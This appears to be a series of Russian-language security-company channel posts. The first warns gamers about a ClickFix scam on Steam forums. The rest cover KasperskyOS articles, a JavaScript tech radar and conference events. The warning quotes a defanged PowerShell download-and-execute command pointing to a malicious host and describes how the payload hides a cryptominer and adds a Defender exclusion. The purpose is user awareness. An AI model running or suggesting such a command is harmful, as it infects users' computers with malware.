❕ Как «проверенный фикс бага» со Steam-форумов превращает ваш компьютер в тихого майнера.
На форумах Steam мошенники отвечают на вопросы про вылеты, баги и пропавший лут и предлагают «быстрое решение»: открыть PowerShell от имени администратора и выполнить команду вида irm msfconfig[.]icu | iex. Звучит безобидно, но это классическая ClickFix‑атака: вас убеждают своими руками запустить вредонос.
Что делает команда:
irm (Invoke‑RestMethod) скачивает скрипт с чужого сервера по указанному адресу;
iex (Invoke‑Expression) сразу исполняет этот скрипт как код PowerShell.
Скрипт притворяется «оптимизатором Windows»: показывает фейковые уведомления про очистку кэша, обновление драйверов и проверку диска. В фоне он создаёт скрытую папку C:\Windows\Background, добавляет её в исключения Defender и скачивает туда криптомайнер XMRig.
Как не попасться:
🟢не копируйте и не запускайте команды PowerShell/Terminal/cmd из чужих советов на форумах, в чатах и комментариях;
🟢перед запуском любой непонятной команды гуглите, что она делает;
🟢не выключайте антивирус по советам сомнительных инструкций.
KasperskyOS: ОС, где безопасность заложена в чертёж 🛡
Свою операционную систему в «Лаборатории Касперского» пишут с нуля уже больше десяти лет. Собрали три свежие статьи с Хабра про то, как она устроена: корень доверия, архитектура микроядра и драйверы на плюсах.
Коротко про систему
KasperskyOS это микроядерная ОС собственной разработки. Ядро маленькое: планировщик, память, процессы, IPC. Драйверы, файловые системы и сетевой стек живут в пользовательском пространстве как обычные приложения, изолированы друг от друга, а каждое взаимодействие проходит через монитор безопасности с политиками. На этом строятся кибериммунные решения, сама ОС сертифицирована по требованиям ФСТЭК.
1. Зачем ОС нужен Root-of-Trust и как KasperskyOS работает с разными реализациями
Антон Рыбаков, руководитель разработки функций безопасности KasperskyOS, объясняет, откуда в системе берётся исходная точка доверия. Корень доверия бывает разным: секрет в eFUSE на кристалле, отдельное security-ядро внутри SoC, внешний чип вроде Secure Element или TPM, открытые проекты типа OpenTitan, доверенная среда исполнения на TrustZone. В статье разбор всех этих вариантов с ограничениями, история про то, что делать, если секрет скомпрометирован и его нельзя заменить, и рассказ про KRoT HAL: слой абстракции, благодаря которому сервисы ОС видят единый интерфейс вместо особенностей конкретного чипа.
2. Безопасность микроядра: где заканчивается трюизм и начинается инженерия
Анна Мелехова, старший архитектор ПО, берёт привычный тезис «микроядро безопаснее, потому что кода меньше» и проверяет его на прочность. Да, в Linux больше 40 миллионов строк и сотни системных вызовов, в микроядре десятки тысяч строк и около десятка вызовов. Но интереснее инженерные следствия. Почему в KasperskyOS можно запретить исполняемые аллокации почти всем процессам. Почему фаззинг через syzkaller находит до смешного мало ошибок. Почему KASLR в микроядре работает сильнее, а коллизии в kCFI встречаются реже.
3. Гетерогенный lookup: как одна фича C++ сделала драйвер проще, чище и быстрее, чем на C
Женя Ерохин, старший разработчик с пятнадцатилетним опытом написания драйверов, рассказывает практическую историю. Драйвер VirtIO Vsock он начал писать на C и быстро упёрся в двусвязные списки, ручной подсчёт ссылок и макросы, где легко ошибиться в имени поля. Тогда драйвер переехал на C++. Дальше подробный разбор: unordered_set с shared_ptr вместо ручного подсчёта ссылок, своя хеш-функция с перегрузками, ошибка компиляции про is_transparent и объяснение, как включается гетерогенный lookup.
На Хабре вышла вторая статья про наши технические радары, предыдущую можно найти здесь.
Вместе с Пашей Востриковым, архитектором веб-направления, анализируем текущий ландшафт JS-разработки и делимся главными инсайтами.
Ключевые выводы:
🟢Базовый стек разработчика наконец устоялся: TypeScript, Git, pnpm, Vite, CI/CD и юнит-тесты прочно закрепились в зоне Adopt.
🟢FSD и микрофронтенды вызывают жаркие споры: сообщество устало платить архитектурный налог без явной бизнес-необходимости.
🟢CSS-in-JS уступает место zero-runtime и нативным возможностям браузера. Инженерный прогресс всё чаще выглядит как удаление технологии.
🟢AI меняет роль разработчика: написание функций уходит ассистенту, а проектирование системных ограничений остаётся человеку.
Исследование всё ещё идёт. Переходите по ссылке, изучайте результаты и делайте свой вклад в развитие карты JS-экосистемы тут.
Let’s GoConf собирает тех, кто пишет на Go и хочет заглянуть под капот самых свежих технологий. Мы приедем с докладом и стендом, где можно проверить себя в деле.
📣 Доклад «От syscall до вердикта за миллисекунды»
Никита Зайцев, Senior Backend Developer, покажет реалтайм-конвейер форензики поверх eBPF: как перехватывать события ядра, обогащать их контекстом пода и выносить вердикт раньше, чем злоумышленник успеет закрепиться. Если вам близки наблюдаемость в Kubernetes, горячие пути и системы с минимальным откликом — приходите.
🎮 После доклада — стенд Kaspersky. Мы собрали три игры из ежедневной жизни Go-разработчика:
• Гошный Alias — объясняете термины через описание и аналогии.
• Построй инфраструктуру — собираете проект из компонентов и защищаете архитектуру перед экспертом.
• Гошная "Своя игра" — набираете баллы и забираете победу.
За каждую пройденную игру — штамп в карточку участника. Соберёте все штампы — заберёте мерч.
Ищите стенд Kaspersky на Let’s GoConf 11 сентября. Будет азартно, полезно и очень по-гошному 🔥
Мы отправились туда, чтобы выяснить это лично. Вот что успели:
🔴 Научили своего ИИ-агента писать сценарии и использовать разные инструменты.
🔴 Сыграли в большую битву ИИ-агентов. Победить не получилось, поэтому бокал холодного пива достался другому.
🔴 Искали скрытые CTF-таски. За найденные задания дают приличное количество офкоинов!
🔴 Проверили себя в квизе. Оказалось, мы неплохо разбираемся в искусстве, науке и кибербезе.
🔴 Искали зараженные картины с искажениями, остатками кода и артефактами ИИ. Все заражения нужно найти за ограниченное время, это оказалось совсем непросто.
Обязательно загляните в лабу и попробуйте свои силы во всех активностях. Уверены, вы справитесь и заработаете очень много офкоинов!